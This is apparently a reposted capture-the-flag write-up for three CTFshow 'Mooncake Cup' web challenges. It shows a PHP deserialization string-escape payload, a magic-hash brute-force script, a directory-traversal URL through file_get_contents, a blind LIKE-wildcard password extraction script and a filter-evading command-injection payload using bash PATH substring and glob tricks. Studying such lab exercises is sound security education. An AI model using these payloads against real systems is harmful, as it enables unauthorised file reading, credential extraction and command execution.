CTFSHOW Mooncake Cup web

web1_this night round

<?php
error_reporting(0);

class a
{
    public $uname;
    public $password;
    public function __construct($uname,$password)
    {
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup()
    {
        if($this->password==='yu22x')
        {
            include('flag.php');
            echo $flag;
        }
        else
        {
            echo 'wrong password';
        }
    }
}

function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

A fairly obvious PHP deserialization string-length (escape) attack. For example, the normal serialized string is:

O:1:"a":2:{s:5:"uname";s:5:"12345";s:8:"password";i:1;}

What if it becomes:

O:1:"a":2:{s:5:"uname";s:5:"12345";s:8:"password";i:123;}";s:8:"password";i:1;}

This is only an illustration: some custom replacement function has made the value in uname longer, but the length recorded at serialization time has not changed (still 5). So unserialize reads 12345 as uname, then reads password as 123, and the trailing ";s:8:"password";i:1;} is effectively cut off.

In this challenge, Firebasky is replaced with Firebaskyup, which adds 2 characters each time. What we want to end up with is roughly:

O:1:"a":2:{s:5:"uname";s:4:"feng";s:8:"password";s:5:"yu22x";}

The part we need to forge is:

";s:8:"password";s:5:"yu22x";}

That is 30 characters long, and each replacement gains 2 characters, so uname needs 15 copies of Firebasky. The final structure is as follows:

<?php
class a
{
    public $uname='FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}';
    //public $uname="feng";
    public $password="yu22x";
}
function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}
echo filter(serialize(new a()));
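As an added example (not from the original post or the challenge), the same filter/unserialize chain emulated in Python: a small serializer for class a, the str_replace filter, and a parser that honours the s:N length prefix the way unserialize does, which is exactly why 15 copies of Firebasky move the property boundary. The serializer and parser are simplified emulations written here, not PHP's own.

```python
import re

NEEDLE, REPL = "Firebasky", "Firebaskyup"       # the challenge's filter() pair
TAIL = '";s:8:"password";s:5:"yu22x";}'          # bytes we want unserialize to see

def php_serialize_a(uname: str, password) -> str:
    """Emulate serialize() for class a with its two public properties."""
    def ser(v):
        if isinstance(v, int):
            return f"i:{v};"
        return f's:{len(v.encode())}:"{v}";'
    return 'O:1:"a":2:{s:5:"uname";' + ser(uname) + 's:8:"password";' + ser(password) + "}"

def php_filter(s: str) -> str:
    return s.replace(NEEDLE, REPL)               # str_replace('Firebasky','Firebaskyup',...)

def parse_props(s: str) -> dict:
    """Minimal unserialize for O:1:"a":2:{...}: string data is read by the
    declared length, so bytes beyond it become the next key/value (the escape)."""
    props, pos = {}, s.index("{") + 1
    def read_value():
        nonlocal pos
        if s[pos] == "i":                        # i:<int>;
            end = s.index(";", pos)
            v = int(s[pos + 2:end]); pos = end + 1
            return v
        m = re.compile(r's:(\d+):"').match(s, pos)   # s:<len>:"<data>";
        n, start = int(m.group(1)), m.end()
        v = s[start:start + n]
        assert s[start + n:start + n + 2] == '";', "length prefix does not match data"
        pos = start + n + 2
        return v
    for _ in range(2):                           # the object declares 2 properties
        key = read_value(); props[key] = read_value()
    assert s[pos] == "}", "object body not closed"   # trailing bytes are ignored
    return props

def build_uname(tail: str = TAIL) -> str:
    growth = len(REPL) - len(NEEDLE)             # each replacement adds 2 bytes
    assert len(tail) % growth == 0
    return NEEDLE * (len(tail) // growth) + tail # 30 / 2 = 15 copies

def demo(uname: str) -> dict:
    return parse_props(php_filter(php_serialize_a(uname, 1)))

if __name__ == "__main__":
    print(demo(build_uname()))                   # password becomes 'yu22x'
```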


web2_old man's heart

<?php
error_reporting(0);
highlight_file(__FILE__);
$a=$_GET['a'];
$b=$_GET['b'];
$c=$_GET['c'];
$url[1]=$_POST['url'];
if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){
    $d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));
    if($d){
        highlight_file('hint.php');
        if(filter_var($url[1],FILTER_VALIDATE_URL)){
            $host=parse_url($url[1]);
            print_r($host);
            if(preg_match('/ctfshow\.com$/',$host['host'])){
                print_r(file_get_contents($url[1]));
            }else{
                echo '差点点就成功了!';
            }
        }else{
            echo 'please give me url!!!';
        }
    }else{
        echo '想一想md5碰撞原理吧?!';
    }
}else{
    echo '第一个都过不了还想要flag呀?!';
}

A simple challenge, except for the md2 in the middle, which had me stuck for a while...

The first is this:

if(is_numeric($a) and strlen($a)<7 and $a!=0 and $a**2==0){

This tests floating-point precision (underflow), and any suitable value works; it is a matter of trying. For example, trying 9e-100 first, $a!=0 holds but $a**2==0 does not. Put plainly, the idea is a float that is not small enough to be 0 on its own, but becomes 0 once it is squared.
After a little trial and error, 9e-180 satisfies it.

Then there is the evil MD2:

$d = ($b==hash("md2", $b)) && ($c==hash("md2",hash("md2", $c)));

The key to this challenge is robots.txt. Normally there is no need to scan directories on a challenge like this, but I did not expect it to be necessary... It gives you this hint:

Is it particularly difficult to break MD2?!
I'll tell you quietly that I saw the payload of the author.
But the numbers are not clear. have fun~~~~
xxxxx024452 hash("md2",$b)
xxxxxx48399 hash("md2",hash("md2",$b))

The hint gives the last digits of b and c, and the first two characters must be 0e. Following the hint, brute-force the remaining positions with pure digits using a python script:

from Crypto.Hash import MD2   # pycryptodome

def md2_hex(s):
    return MD2.new(s.encode("utf-8")).hexdigest()

def is_magic(h):
    # PHP's loose == treats "0e<digits only>" as the number 0, so every
    # character after "0e" must be a digit (the original only checked 9 of them)
    return h[0:2] == "0e" and h[2:].isdigit()

# first value: 0e + 3 unknown digits + the suffix 024452 from the hint
for v1 in "0123456789":
    for v2 in "0123456789":
        for v3 in "0123456789":
            v = "0e" + v1 + v2 + v3 + "024452"
            if is_magic(md2_hex(v)):
                print("第一个是:"+v)

# second value: 0e + 4 unknown digits + the suffix 48399, hashed twice
for v1 in "0123456789":
    for v2 in "0123456789":
        for v3 in "0123456789":
            for v4 in "0123456789":
                v = "0e" + v1 + v2 + v3 + v4 + "48399"
                if is_magic(md2_hex(md2_hex(v))):
                    print("第二个是:"+v)

Installing python's Crypto library comes with many mysterious problems. I had already forgotten the solutions by the time I wrote this post, so later readers are on their own... I think the hardest part of this challenge is not the knowledge but installing the Crypto library...

The last part is this:

highlight_file('hint.php');
if(filter_var($url[1],FILTER_VALIDATE_URL)){
    $host=parse_url($url[1]);
    print_r($host);
    if(preg_match('/ctfshow\.com$/',$host['host'])){
        print_r(file_get_contents($url[1]));
    }else{
        echo '差点点就成功了!';
    }
}else{
    echo 'please give me url!!!';
}

The hint says the flag is in fl0g.txt, so it has to be read through file_get_contents.
Here is a small trick of the file_get_contents function:

When PHP's file_get_contents() meets an unknown pseudo-protocol (scheme) prefix, it treats that prefix as a directory name, which produces a directory traversal. At that point you only need to climb up the directories to read a file in the root directory.

So construct an unknown protocol prefix, and then the directories can be traversed:

url=httpp://ctfshow.com/../../../../../../../../fl0g.txt

web3_Mo negative Chanjuan

Having already worked through the mooncake cup web3 revenge series (the introduction to WEB), this challenge really broadened my horizons.

On entering the environment you first have to log in; F12 shows some important information:

<!-- Note: delete the commented content before going live! -->
<!-- username yu22x -->
<!-- SELECT * FROM users where username like binary('$username') and password like binary('$password')-->

Seeing the like, I thought it needed injection. I ran a fuzz and it felt like everything needed for injection was banned, except the like wildcards % and _. I figured that if the select returned a row I could log in, so I kept adding _ to match; only 32 of them matched, but this was returned:
I have filtered all the characters. Why can you come in? get out!
That shows the password can be extracted with a Boolean-based injection, so write a python script:

import requests

url = "http://e311aa89-4b46-4cdb-bf83-cfdb0504d0a3.chall.ctf.show/login.php"

password = ""
length = 32   # a pattern of 32 "_" was the first one that matched
result = "67815b0c009ee970fe4014abaa3Fa6A0"   # the password this script recovered
for i in range(0, length):
    # like binary is case-sensitive, so the alphabet includes upper-case letters
    for j in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
        # known prefix + candidate character, padded with "_" to 32 characters
        payload = password + j + "_" * (length - 1 - len(password))
        data = {
            "username": "yu22x",
            "password": payload
        }
        r = requests.post(url=url, data=data).text
        if "wrong" not in r:
            password += j
            print(password)
            break
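As an added example (not from the original post), the same character-by-character loop run offline against a stand-in for login.php that emulates the like binary('$password') comparison, so the _ padding and case-sensitivity logic can be checked without the challenge server. SECRET, like_binary and login_oracle are constructed here for the demonstration.

```python
import re

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
SECRET = "67815b0c009ee970fe4014abaa3Fa6A0"   # constructed stand-in for the stored password

def like_binary(pattern: str, value: str) -> bool:
    """Case-sensitive LIKE: '_' matches one character, '%' any run, all else literal."""
    regex = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value, re.DOTALL) is not None

def login_oracle(username: str, password_pattern: str) -> str:
    """Constructed stand-in for login.php: the page's 'wrong' text unless the row matches."""
    if username == "yu22x" and like_binary(password_pattern, SECRET):
        return "welcome"
    return "wrong password"

def extract(length: int = 32, oracle=login_oracle) -> str:
    """Recover the password one position at a time using the Boolean oracle."""
    known = ""
    for _ in range(length):
        for ch in ALPHABET:
            # known prefix + candidate, padded with "_" so the pattern is always 32 long
            pattern = known + ch + "_" * (length - 1 - len(known))
            if "wrong" not in oracle("yu22x", pattern):
                known += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {len(known)}")
    return known

if __name__ == "__main__":
    print(extract())
```

Because the comparison is binary, a lowercase f at position 27 is rejected and the loop only advances on the uppercase F, which is why the alphabet has to include both cases.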

After logging in, go to /P1099.php. It is a fairly obvious command execution: the front part is a ping, use ; to separate commands, and then find a way to execute a second command of your own.

Because I have done many hardened versions of this challenge, with all sorts of things banned, and learned a variety of tricks, this second question with almost no filtering is very easy. It filters lowercase letters and some symbols. Here the payload is built from bash's built-in variables, and since numbers are not banned it is easy to construct. The following payload runs /bin/base64 flag.php:

ip=127.0.0.1;${PATH::1}???${PATH::1}????64 ????.???

Constructing the / is enough. More tricks can be picked up after working through the web3 revenge series. Hehehe.


Origin blog.csdn.net/rfrder/article/details/113274503